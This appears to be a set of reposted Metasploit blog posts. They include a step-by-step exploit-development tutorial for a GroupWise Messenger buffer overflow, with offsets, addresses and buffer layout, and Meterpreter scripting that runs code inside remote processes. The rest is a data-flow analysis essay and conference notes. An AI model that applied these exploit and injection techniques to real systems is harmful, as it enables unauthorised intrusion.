
Originally Posted by hdm



Exploit modules developed for the Metasploit Framework are designed to contain as little "boilerplate" code as possible. This allows us to extend features and APIs without having to rewrite each and every exploit module. The exploit development process can be time consuming and frustrating; most of the time spent on an exploit is represented by only a few lines of finished code. In this post, I would like to walk you through the development process of a typical exploit module.


On April 13th, 3Com's Zero Day Initiative released an advisory about a buffer overflow in the instant messaging server for Novell GroupWise. The advisory explains that a long Accept-Language header will overwrite the stack, leading to arbitrary code execution.


The first step is to obtain the vulnerable software and install it onto a patched virtual machine. In this case, I chose a Windows 2000 SP4 VMware image, made sure it was up to date, then started to look for the software. According to Novell's advisory, the vulnerable component can be found in the Novell GroupWise 7 Beta (and fixed in Support Pack 1, Beta 2), but it can also be downloaded as a separate component, without having to install all of GroupWise. GroupWise Messenger requires a NetWare tree and context, which requires eDirectory, which requires the Novell NetWare Client software. The process for installing GroupWise Messenger from scratch is:


1) Locate a copy of the NetWare client and install it.
2) Download the eDirectory 8.8 Evaluation from Novell and install it.
3) Download the GroupWise Messenger 2 Evaluation from Novell and install it.


Once you get past the configuration phase, the Messenger installer will ask whether you would like to start the agents (via a checkbox on the last window). Check this box and finish the install.


Two windows should pop up: one is the Archiving Agent and the other is the Messaging Agent. The Messaging Agent is responsible for hosting the vulnerable web service on port 8300. Open up your browser and verify that the web server is online and ready to serve requests. If the agent spits out an error when it starts, you probably specified an invalid redirect address during the install process; just reinstall the Messenger software using a valid, non-loopback IP address.


If you don't see either window, open up the Services control panel item, find the Novell Messenger Messaging Agent service, and restart it.


Now that the Messaging Agent is running, we can start playing with the bug. This involves some basic debugging skills and a couple of tools. I prefer to use WinDbg from Microsoft, but many folks like the OllyDbg interface and features better. Regardless of which one you use, start it up and attach to the Messaging Agent process. The process name will be listed as nmma.exe, and yes, there are two of them, but in most cases the one with the higher process ID is the correct one. If you are using WinDbg, use F6 to open the Attach to Process dialog, find nmma.exe, and expand the process information by clicking on the little X to view the command line. The process you want will show nnmMessagingAgent in the command line. Complete attaching to the process, and use the go command (in WinDbg) to get the process running again.


Now that we have a debugger attached to the process, it's time to reproduce the bug. We need to send an HTTP GET request with an Accept-Language header consisting of a string over 16 bytes in length. We want to start off with the longest string first and keep shortening this string with each request until we get the crash. This ensures that the largest number of bytes under our control will be in memory and gives us the best chance of smashing a SEH pointer on the first attempt. The data we use as the string is a non-repeating (a lie, it does repeat, but not for quite a few bytes) alphanumeric text string generated by the Metasploit Framework's Pex library, specifically Pex::Text::PatternCreate(). A sample string looks like:


$ perl -I framework-2.5/lib -e 'use Pex; print Pex::Text::PatternCreate(64)'
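For readers without a 2.5 tree at hand, the idea behind the pattern can be sketched in a few lines of Ruby. This is not the Pex source: pattern_create is a hypothetical stand-in, and the uppercase/lowercase/digit triplet scheme is an assumption (it does agree with the offsets reported later in this post).

```ruby
# Hypothetical stand-in for Pex::Text::PatternCreate.
# Assumption: the pattern is built from (uppercase, lowercase, digit)
# triplets, so every 4-byte window is unique for quite a few bytes.
def pattern_create(length)
  out = +''
  ('A'..'Z').each do |upper|
    ('a'..'z').each do |lower|
      ('0'..'9').each do |digit|
        out << upper << lower << digit
        # Stop as soon as enough bytes have been generated.
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length] # pattern space exhausted (26 * 26 * 10 * 3 bytes)
end

puts pattern_create(64)
```

Because each triplet changes only one character at a time, any 4 bytes that show up in a register can be mapped back to a single position in the string.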


Start off using 8192 bytes, then 4096, then 3000, then 2000. When we try 2000 bytes, the debugger throws an exception:


(e10.314): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02c9e1b0 ecx=ffffffff
edx=61614273 esi=02c9e690 edi=61614273
eip=00430a7a esp=02c9e164 ebp=02c9e170
00430a7a f2ae repne scasb es:61614273=??


The scasb instruction compares the byte specified by the address in the edi register with the byte stored in the low 8 bits of the eax register. This opcode increments the edi by one each time it is called. The repne prefix causes this operation to be repeated, for as many times as the ecx register specifies, until the comparison returns true. In this case, we see that eax is 0 and ecx is set to the largest 32-bit value (0xffffffff). This means that this instruction will start reading at the memory address stored in edi and keep scanning until it finds a NULL byte (or 4Gb of data has been processed, not a likely occurrence). The edi register is set to 0x61614273, which is definitely part of the data that we control. To figure out what offset into our string is being used here, we use the script located in the sdk directory of the Metasploit Framework (v2.5).


$ perl sdk/ 0x61614273 8192


No output. This means that before our data was used, the application modified it. We know the data is being used to overwrite some kind of string pointer and we know that the application is trying to figure out how long this string is by scanning it, looking for a NULL byte, and then seeing what ecx has been decremented to, obtaining the length of the string. The function we are in must be strlen() or an equivalent.
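The way a length falls out of the repne scasb loop described above can be modelled in plain Ruby. This is only a sketch of the instruction's effect on ecx with al set to 0; the function name and the sample buffer are made up for illustration, and a read past the end of the buffer stands in for the access violation seen in the debugger.

```ruby
# Models `repne scasb` with al = 0 and ecx = 0xffffffff over a byte string.
# Returns [final ecx, string length recovered from ecx].
def repne_scasb(memory, start)
  ecx = 0xffffffff
  edi = start
  loop do
    byte = memory.getbyte(edi)
    # Reading unmapped memory is what raised the access violation.
    raise IndexError, 'read outside the buffer' if byte.nil?
    edi += 1
    ecx = (ecx - 1) & 0xffffffff
    break if byte.zero? || ecx.zero?
  end
  # ~ecx counts the bytes scanned, including the terminating NULL.
  [ecx, (~ecx & 0xffffffff) - 1]
end

ecx, len = repne_scasb("hello\x00junk".b, 0)
printf("ecx=%08x strlen=%d\n", ecx, len)
```

The complement of ecx is the string length plus one for the NULL terminator, which is the kind of value a following copy loop would use as its byte count.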


If we use the Memory view in WinDbg and specify esp as the address, we notice that the entire stack is covered in our data. The k command, which displays the call stack, shows that the return address of the current function has been smashed with the long text string. Upon closer inspection, we can see that all uppercase characters in our string have been converted to their lowercase equivalents.


We detach from the process and use the Services control panel to restart the service, wait for it to initialize, and then reattach WinDbg. The Novell advisory states that any value greater than 16 bytes will trigger the overflow, so instead of using our long string value, we send only 20 bytes, with the last 4 bytes specified as the string 0000 (0x30303030). The exception is thrown again, this time with edi set to 0x30303d42, 3346 bytes above the address we supplied. To pass this exception, we need to set this offset to a memory address that, when 3346 is added to it, points to a NULL-terminated string.


Finding a NULL-terminated string in memory isn't difficult, but we need to ensure that the address of the string doesn't contain any uppercase characters, NULLs, new lines, carriage returns, commas, or semicolons. Since we are just reading memory, we can use any loaded DLL that has an address in an acceptable range. On my system the dclient.dll module (part of eDirectory) is loaded at base address 0x61000000 and extends to 0x6104f000. Most of the addresses between 0x61010101 and 0x6104efff should work for us. The address 0x6102010b points to "0x01 0x00", a one-byte string that should allow us to pass the strlen() code. We then decrement this address by 3346 bytes, giving us 0x6101f3f9.
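Both checks in this step, the 3346-byte adjustment and the character restrictions, are easy to script. The sketch below assumes the restricted set is exactly the one listed above (A-Z, NULL, new line, carriage return, comma, semicolon); usable_address? and the constant names are illustrative and are not part of the Framework.

```ruby
# Bytes that must not appear in the header value, per the list above.
RESTRICTED_BYTES = (0x41..0x5a).to_a + [0x00, 0x0a, 0x0d, 0x2c, 0x3b]

# The server adds this many bytes to the pointer we supply before scanning.
SCAN_DELTA = 3346

# True if none of the address's four little-endian bytes is restricted.
def usable_address?(addr)
  [addr].pack('V').bytes.none? { |b| RESTRICTED_BYTES.include?(b) }
end

supplied = 0x6101f3f9
printf("supplied %08x, scanned %08x, usable: %s\n",
       supplied, supplied + SCAN_DELTA, usable_address?(supplied))
```

Running the same predicate over candidate return addresses is a quick way to discard any that the lowercase conversion would corrupt.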


We detach from the process, restart the service, and reattach again. This time, we are going to send 16 bytes of padding, the 0x6101f3f9 address, packed in little-endian format ("\xf9\xf3\x01\x61") and followed by 1024 bytes of the non-repeating string pattern. A new exception appears:


(dc4.dac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=61346961 ecx=00000002
edx=6102010b esi=6102010b edi=61346961
eip=00430a92 esp=02c9e164 ebp=02c9e170
00430a92 f3a4 rep movsb ds:6102010b=01 es:61346961=??


The movsb instruction takes one byte from the address specified by the esi register and writes it to the address specified by the edi register, incrementing both esi and edi by one. The rep prefix indicates that this will repeat for as many times as the value in the ecx register specifies. We can guess that the value in ecx is the return value of our strlen() function, with one byte added to it to account for the NULL trailer. The edi register points to an address that is most definitely under our control. We know that the application will convert all uppercase characters to their lowercase equivalents, so we can start taking a guess at what offset into our non-repeating string is being used as the destination pointer.


$ perl sdk/ 0x61346961 1024
[no output]
$ perl sdk/ 0x41346941 1024


Great! We know that 252 bytes into our pattern, we can overwrite a character pointer that is used as the destination address in the above memory copy routine. At this point, we can set our source pointer to a string we control, and the destination pointer to anything we want to overwrite, and have a field day modifying global variables, overwriting pointers, and generally having our way with the process.
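The guess-and-retry step above can be automated by comparing case-insensitively. The following is a sketch only: pattern_create is a hypothetical stand-in for Pex::Text::PatternCreate (assuming the uppercase/lowercase/digit triplet scheme), and both lookup helpers are made-up names rather than the sdk script itself.

```ruby
# Hypothetical stand-in for Pex::Text::PatternCreate (assumed triplet scheme).
def pattern_create(length)
  out = +''
  ('A'..'Z').each do |upper|
    ('a'..'z').each do |lower|
      ('0'..'9').each do |digit|
        out << upper << lower << digit
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Exact lookup: the register value must appear byte for byte in the pattern.
def pattern_offset(value, length)
  pattern_create(length).index([value].pack('V'))
end

# Case-folded lookup: tolerates a target that lowercased our data.
def pattern_offset_folded(value, length)
  pattern_create(length).downcase.index([value].pack('V').downcase)
end

p pattern_offset(0x61346961, 1024)         # value as seen in edi
p pattern_offset(0x41346941, 1024)         # value with the case restored by hand
p pattern_offset_folded(0x61346961, 1024)  # folded lookup, no guessing needed
```

Under that assumption the exact lookup of the downcased value finds nothing, while the other two calls land on 252, matching the offset above. Folding can introduce ambiguous matches in longer patterns, so a hit is worth confirming against the original string.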


Now let's see what happens if we cause the memory copy to complete without an error. We need another address, this time pointing to writable memory, in a known location, that isn't made up of our restricted characters. Since we are using dclient.dll already for the source pointer, we might as well use it for the destination pointer as well. Using the objdump command, we see that the .data section of the dclient.dll module is at address 0x61041000. To make our memory copy safe, we increment our source pointer by one byte, so that it points to a NULL byte directly, then we find a destination pointer in the .data section that also points to a single NULL byte. It just so happens the first dozen bytes of the .data section are already NULLs, so we can use 0x61041001 as the destination pointer and 0x6101f3fa as the source pointer. Technically, we can just make both the source and the destination pointers the same and have them point to the same writable address, but you get the idea.


We bounce the service and reattach with the debugger. The next request will be 1024 bytes of non-repeating data, with the 4 bytes at offset 16 replaced with the source address, and the 4 bytes at offset 272 replaced with the destination address.


(db8.c58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000002 ecx=6104100a
edx=61041001 esi=02c9e690 edi=02c9e559
eip=61386961 esp=02c9e2a4 ebp=00000000
61386961 ?? ???


We now have control of the execution path. We use the same sdk script to figure out what offset into our buffer matches up with the address in EIP. After converting the downcased 0x61's to 0x41's, we see that it is offset 264. The question is, what address do we put here? If we open up the WinDbg Memory view again and enter esp as the address, we see the following bytes:


02c9e2a4 69 39 61 6a


Again, we guess at what the un-downcased address was, convert this to little-endian, get 0x6a413969, then run the script again to get offset 268. If we can find a sequence of opcodes in memory that performs a jmp esp, or a push esp; ret, we can use this to return directly back to our buffer. The Framework includes a tool specifically for this purpose, msfpescan. Since our exploit code is already dependent on dclient.dll, let's use msfpescan to look for a jmp esp instruction there:


$ msfpescan -f dclient.dll -j esp
0x6103c3d3   jmp esp
0x6103c92b   jmp esp
0x6103ca53   jmp esp
0x6103cbfb   jmp esp


With the exception of the third address (its low byte, 0x53, is an uppercase S), all of these addresses can be used to jump back into our code. If we felt like being crafty, we could use the memcpy() routine to write a jmp esp opcode into a location of our choice, and then return into it. If we replace the 4 bytes at offset 264 with one of these addresses, the application will return into the jmp esp, which transfers execution to the location in the esp register: the code we place at offset 268. Since offset 268 is 4 bytes before our destination pointer, we need to jump past it, and then place our shellcode into the area immediately past the destination pointer. The easiest way to represent a jmp opcode in x86 is with "\xeb\xXX", where XX is replaced by the number of bytes to jump. The displacement is a signed byte counted from the end of the 2-byte instruction, so this method is limited to jumping 129 bytes forward (127 + 2 bytes for the opcode itself) or 126 bytes backward (128 - 2), measured from the start of the jmp. At offset 268, we place 2 bytes, "\xeb\x06", which will jump right over the destination pointer. We then place a single byte at offset 276, "\xcc", which represents the "int3" instruction that will cause the application to trap to the debugger.
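The displacement arithmetic for the short jmp is easy to get wrong by two, so here is a small sketch of it. short_jmp is an illustrative helper, not a Framework function; it takes buffer offsets and returns the two opcode bytes.

```ruby
# Encodes an x86 short jmp (opcode 0xeb, signed 8-bit displacement).
# The displacement is relative to the end of the 2-byte instruction.
def short_jmp(from, to)
  rel = to - (from + 2)
  unless (-128..127).cover?(rel)
    raise ArgumentError, "target is out of rel8 range (#{rel})"
  end
  [0xeb, rel].pack('Cc')
end

# Jump from offset 268 over the destination pointer to offset 276.
puts short_jmp(268, 276).unpack1('H*')
```

For the offsets used here the result is the same "\xeb\x06" pair described above: the jmp occupies 268 and 269, and 6 more bytes lead to 276.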


The entire string now looks like:


use Pex;  # run with -I framework-2.5/lib, as in the earlier one-liner

# 1024-byte pattern with the pointers patched in at the offsets found above
my $pattern = Pex::Text::PatternCreate(1024);
substr($pattern, 16, 4,  pack('V', 0x6101f3fa)); # SRC
substr($pattern, 272, 4, pack('V', 0x61041001)); # DST
substr($pattern, 264, 4, pack('V', 0x6103c3d3)); # JMP ESP
substr($pattern, 268, 2, "\xeb\x06"); # JMP +6
substr($pattern, 276, 1, "\xcc"); # TRAP


We detach from the process, restart the service, reattach, and send our new string:


(d78.33c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000002 ecx=6104100a
edx=61041001 esi=02c9e690 edi=02c9e559
eip=02c9e2ac esp=02c9e2a4 ebp=00000000
02c9e2ac cc int 3


Hurray! We now have arbitrary code execution. The final trick is replacing the 0xCC byte with real shellcode that doesn't contain any of the restricted or uppercase characters. The current version of the Metasploit Framework has a tough time avoiding A-Z, so only a few payloads can be successfully encoded (such as win32_reverse_ord). The finished exploit module for version 2.5 can be automatically installed using the msfupdate -u command.




The Novell Messenger Messaging Agent service terminated unexpectedly.  It has done this 78 time(s).  The following corrective action will be taken in 0 milliseconds: No action

Originally Posted by skape



In a previous post I illustrated a very basic data flow dependency graph.  This graph was meant to describe the order (and thus dependencies) of memory read and write operations within the context of a given function.  While this graph may be useful in some circumstances, the simple fact that it's limited to a specific function means that there will be no broad applicability or understanding of the program as a whole.  To help solve that problem, it makes sense to try to come up with a way to describe data flow dependencies in a manner that crosses procedural boundaries.  By doing this, it is possible to illustrate dependencies between functions by analyzing both a function's formal parameters (both actual arguments and global variable references) and output data (such as its return value). 


To better understand this, let's take an example C program as illustrated below:



#include <windows.h>
#include <stdlib.h>

typedef struct _list_entry
{
   struct _list_entry *next;
   struct _list_entry *prev;
} list_entry;

list_entry *list = NULL;

list_entry *add()
{
   list_entry *ent = (list_entry *)malloc(sizeof(list_entry));
   if (list)
   {
      ent->prev = list->prev;
      ent->next = list->next;
      if (list->prev)
         list->prev->next = ent;
      if (list->next)
         list->next->prev = ent;
   }
   list = ent;
   return ent;
}

void remove(list_entry *ent)
{
   if (ent->prev)
      ent->prev->next = ent->next;
   if (ent->next)
      ent->next->prev = ent->prev;
}

void thread(void *nused)
{
   while (1)
   {
      list_entry *ent = add();
      remove(ent);
   }
}

int main(int argc, char **argv)
{
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread, NULL, 0, NULL);
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread, NULL, 0, NULL);
   thread(NULL);
}


This program is a very simple (and intentionally flawed in more ways than one) linked list implementation.  The basic idea is that three threads run simultaneously, each inserting and removing a node from the list as fast as possible.  In a future post I'll talk about how we can use data flow analysis to attempt to identify data consistency issues in a multi-threaded application (such as this), but for now, let's focus simply on doing interprocedural data flow analysis.  Keep in mind from our previous post that there are two types of data flow dependencies, a value dependency and an address dependency.  A value dependency, denoted by blue edges, means that one instruction depends on the value read from memory (Example: mov [ebp-0x4],eax depends on mov eax,[ebp+0x8] for the value of eax).  An address dependency, denoted by red edges, means that a value read from memory is being used to reference another location in memory (Example: mov [ecx],eax depends on mov ecx,[edx] since ecx is being used as a pointer that was obtained through edx).


When we compile the example program, we can use our existing intraprocedural data flow analysis approach to identify localized data dependencies using a disassembler specific to the architecture that we compiled the program for.  While this works perfectly fine, it can end up being more complicated than it would otherwise need to be.  An alternative approach that has been used in other projects (such as valgrind) is to take the architecture specific code and translate it into a more universal instruction set.  By doing this, we can write our tools in a manner that allows us to not care about the underlying architecture, thus masking a degree of complexity and code duplication.  I'm not going to go into the specifics of the instruction set that MSRT uses at this point, but the important matter is that it boils down all operations that result in memory access into a load or store operation (potentially using a temporary pseudo-register when necessary).  This allows us to more easily determine data flow dependencies.  With this in mind, let's try to understand the graph that is generated when we do an interprocedural data flow analysis on the program displayed above:




At first glance this graph is probably pretty confusing, so let's try to work our way out from a known point so that we can better understand what's going on.  First, it's important to understand that the direction of the edges denotes that u depends on v where the edge is pointing to v.  Knowing this, it probably makes sense to start at the only node that isn't dependent on anything else: the call malloc node.


If we work our way backwards from this node, we can begin to better understand how the nodes relate to the source code.  For instance, we see that the node store eax, [ebp-0x4] depends on call malloc.  The reason for this dependency is that malloc is the last node to modify eax.  If we look at the source code, we see that the first thing done after malloc returns is that the ent local variable is set to the return value.  As one would expect, the ent local variable is located at ebp-0x4.  If we follow the dependencies backward one node further to store edx, [0x55], we can correlate this to the setting of the global variable list (which, in this disassembly, is represented as existing at address 0x55).  Try walking back further to see if you can associate other portions of the data dependency graph with areas of the source code within the add function.


Back on topic, though, I want to focus on illustrating how the interprocedural dependency relationships are conveyed.  As we can see, each of the three functions is identified by a different node color.  add is represented by green, thread is represented by cyan, and remove is represented by magenta.  The dotted line between nodes of a different color represents an interprocedural dependency.  Let's focus on the dependency between add and thread first.


As we know from the source code, the thread function takes the return value from add and passes it to remove.  This is conveyed in terms of a data flow dependency by noting that eax is set prior to returning from add.  Therefore, the use of eax within the thread function implies an interprocedural value dependency between the load [ebp-0x4], eax instruction in add and the store eax, [ebp-0x4] instruction in thread.  Furthermore, if we follow the value dependencies up from that point, we can see that the return value from add is subsequently passed as the first actual argument to remove.  By virtue of this fact, an interprocedural value dependency exists between the first argument of remove and the return value of add.


In the interest of not writing a book, I'm going to cut this post a bit short here.  In closing, there are many interesting things that you can learn by understanding the different aspects of a data flow graph.  For instance, you can begin the process of simplifying the graph.  One way of simplifying the graph would be through value dependency reduction.  This means that any time you have the scenario of u depends on v for value and v depends on z for value, you can reduce it to u depends on z for value.  Try it out with the sample graph above and see if it makes sense.  Another interesting thing you can do is translate the graph into a series of equations or statements that describe the data flow process by simply turning each of the edges into a function of the node (or derived node) that they depend on. 
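Value dependency reduction is simple enough to sketch on a toy graph. The code below is not how MSRT does it; it is a minimal illustration that assumes the value edges are held in a hash mapping each node to the nodes it depends on, with the node names u, v, and z borrowed from the rule above. It applies the rule repeatedly until every node points at sources that have no further value dependency.

```ruby
# deps maps a node to the nodes it depends on for value.
# Returns a new hash in which every chain u -> v -> z has been
# collapsed to u -> z. Address dependencies are not modelled here.
def reduce_value_deps(deps)
  resolve = lambda do |node, seen|
    parents = deps.fetch(node, [])
    # Stop at a node with no value dependency, or when a cycle is hit.
    return [node] if parents.empty? || seen.include?(node)
    parents.flat_map { |parent| resolve.call(parent, seen + [node]) }.uniq
  end

  deps.each_with_object({}) do |(node, parents), out|
    out[node] = parents.flat_map { |parent| resolve.call(parent, [node]) }.uniq
  end
end

graph = { 'u' => ['v'], 'v' => ['z'], 'z' => [] }
p reduce_value_deps(graph)
```

Collapsing all the way to the sources is one design choice among several; stopping after a single step, or keeping nodes that also carry an address dependency, may be preferable when the intermediate nodes still matter.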


At the moment MSRT doesn't have full support for some of the things described in this post (the graph was actually generated using a combination of manual and automated analysis).  Hopefully this post wasn't too incoherent =)  It's a tad bit late...

Originally Posted by skape



So what does it mean when we talk about all the cool automation support that Metasploit 3.0 has? Well, the answer is fairly broad. It means you can implement plugins and other tools that can be used to extend and automate a number of features included in the framework. By virtue of this fact, it means that you can extend and automate one of the areas that I personally find the most interesting: post-exploitation payloads. Spoonm and I recently completed a tour of duty describing some of the cool accomplishments in the area of post-exploitation technology. One post-exploitation payload that we focused most of our attention on was Meterpreter. In Metasploit 3.0, we spent some time thinking about what could be done to make Meterpreter more useful. As you might have guessed, our conclusion was to make it more accessible from a scripting level rather than strictly through the user interface. Through some of the examples below, I hope to illustrate a few random things you can do with this scripting interface. Keep in mind that this is just a very small example of the things that you can do :).


To easily demonstrate these examples, I made use of Meterpreter's builtin IRB mode.  For those familiar with the irb script that comes with Ruby, you'll be right at home with Meterpreter's IRB mode. In IRB mode, you can drop into what is most easily thought of as a Ruby shell. In this shell (with full readline support), you can write Ruby on the fly to do whatever it is you want. In this case, we'll be writing a few small scriptlets that operate on an established Meterpreter client connection. Even though I used IRB mode, it is equally possible to write standalone scripts. To drop into IRB mode from a Meterpreter session, simply do the following:



meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client




The client variable is automatically scoped such that it represents the Meterpreter client session. Through the client instance it is possible to access all of the features provided by the Meterpreter session and its extensions. With the background out of the way, it's time to actually demonstrate some stuff.


Example #1: Creating a thread and running arbitrary code


This example shows how you can use Meterpreter to create a thread that executes arbitrary code that you define either in the current process or in another process running on an exploited machine. Perhaps you have a payload blob lying around that you previously used as a staged payload and now you want to execute it after you've successfully loaded meterpreter? Or perhaps you have other uses...



>> p = client.sys.process.execute('calc.exe')
>> buf = p.memory.allocate(4096)
=> 7929856
>> "%.8x" % 7929856
=> "00790000"
>> p.memory.write(0x00790000, "\xcc")
=> 1
>> thr = p.thread.create(0x00790000, 0)



As shown above, calc.exe is executed and a process instance is stored in the variable p.  Next, 4096 bytes of memory are allocated at an arbitrary location, the address of which is stored in the variable buf.  The arbitrary payload (which in this case is simply \xcc) is then written to that region of memory. Finally, we create a thread using the base address of the allocation as the thread entry point. The end result: a new thread is created that executes our int 3.



Example #2: Searching a process' address space


What if you have a specific chunk of data that you want to locate in a process' address space? Fear not, for Meterpreter has builtin support for performing all of the basic memory management functions that will allow you to search for whatever it is you want. In this example, we're simply searching the address space for the locations of a jmp esp instruction.  Why would we want to do this?  Who knows.  It's just an illustration :).



>> p =
>> addr = 0
=> 0
>> while addr <= 0x7ffe0000
>>    info  = p.memory.query(addr)
>>    addr += info['RegionSize']
>>    next if (info['Available'])
>>    buf   =['BaseAddress'], info['RegionSize'])
>>    off   = 0
>>    while off = buf.index("\xff\xe4", off)
>>       puts "jmp esp at %.8x" % (info['BaseAddress'] + off)
>>       off += 1
>>    end
>> end
jmp esp at 00235028
jmp esp at 004894fb
jmp esp at 010197c4
jmp esp at 01019a0d
jmp esp at 77e4c57e
jmp esp at 77f5801c
jmp esp at 77f77343
=> nil



This approach works simply by enumerating all of the regions in a process' address space (in this case the current process). As it finds regions that aren't available (meaning they are allocated), it reads the entire region and searches for the opcodes that compose the jmp esp instruction.  As it finds matches, it displays the locations at which they reside.
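The inner search loop is ordinary Ruby and can be tried without a Meterpreter session. The sketch below runs it over a local byte string; find_all, the sample bytes, and the base address are all made up for illustration, and in a real session the buffer would come from the region read described above.

```ruby
# Returns every offset at which needle occurs in buf, overlaps included.
def find_all(buf, needle)
  hits = []
  off = 0
  while (off = buf.index(needle, off))
    hits << off
    off += 1 # step one byte so overlapping matches are not skipped
  end
  hits
end

JMP_ESP = "\xff\xe4".b                  # opcode bytes for jmp esp
region  = "\x90\xff\xe4\xcc\xff\xe4".b  # stand-in for one memory region
base    = 0x00400000                    # hypothetical region base address

find_all(region, JMP_ESP).each do |off|
  puts "jmp esp at %.8x" % (base + off)
end
```

Keeping both strings binary (via .b) avoids encoding surprises when the region contains bytes that are not valid text.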


Example #3: Loading libraries and getting symbol addresses


What if you want to write some custom code to proxy calls to API functions on the remote machine? Well, if you're going to do that, then you're going to need some way to load libraries and resolve the locations of the symbols via the dynamic loader. To facilitate this (and other things), Meterpreter provides a (hopefully) easy interface. The example below shows how you can load a library, in this case ws2_32.dll, into the address space of a process and then proceed to resolve symbols.



>> p = client.sys.process.execute('calc')
>> "%.8x" % p.image['kernel32.dll']
=> "77e60000"
>> "%.8x" % p.image['ws2_32.dll']
=> "00000000"
>> p.image.load('ws2_32.dll')
=> 1907032064
>> "%.8x" % p.image['ws2_32.dll']
=> "71ab0000"
>> "%.8x" % p.image.get_procedure_address('ws2_32.dll', 'connect')
=> "71ab3e5d"



Fairly straightforward, right?


In this post, I focused primarily on memory management and the dynamic loader interface. Keep in mind that these are just a few examples of the things you can do with a process. Furthermore, these are just a few examples of the things you can do with Meterpreter itself. With the ability to load arbitrary extensions (in the form of DLLs), the possibilities are endless...or something :).

Originally Posted by hdm



Just a few highlights from the CanSecWest 2006 conference:


The slides for my Metasploitation talk are now online; look forward to a new code release sometime next week. TK posted a really nice review on the nCircle Blog.


Julien Tinnes presented on HIPS evasion and released the SLIPFEST toolkit for HIPS evaluation.


Renaud Bidou presented on IPS testing and released an IPS evaluation toolkit.


Dennis Cox presented on common flaws in network security devices, particularly inline systems such as routers, switches, and intrusion prevention systems. His slides should be available from the web site sometime soon.


van Hauser (of THC fame) presented on hacking the IPv6 protocol (an old copy of the slides is available) and released a new version of his IPv6 tools.


Nico Fischbach presented on the state of VoIP carrier security, leaving most of the audience cringing in horror.


Halvar Flake presented on finding and exploiting bugs involving uninitialized variables, inspiring me to take another look at MS02-018. He uses some really fun tricks to figure out what stack space overlaps between function calls.


Matt Murphy and I developed a quick browser CSS fuzzer and presented it during a two minute lightning talk at the end of the day.


Major Malfunction presented on some really cool tricks involving magnetic strips (credit cards, hotel keys, boarding passes...).


Eric Byres (and colleagues) presented on common flaws in SCADA equipment and demonstrated a nifty testing tool called Achilles.


The complete list of CanSecWest presentations can be found HERE

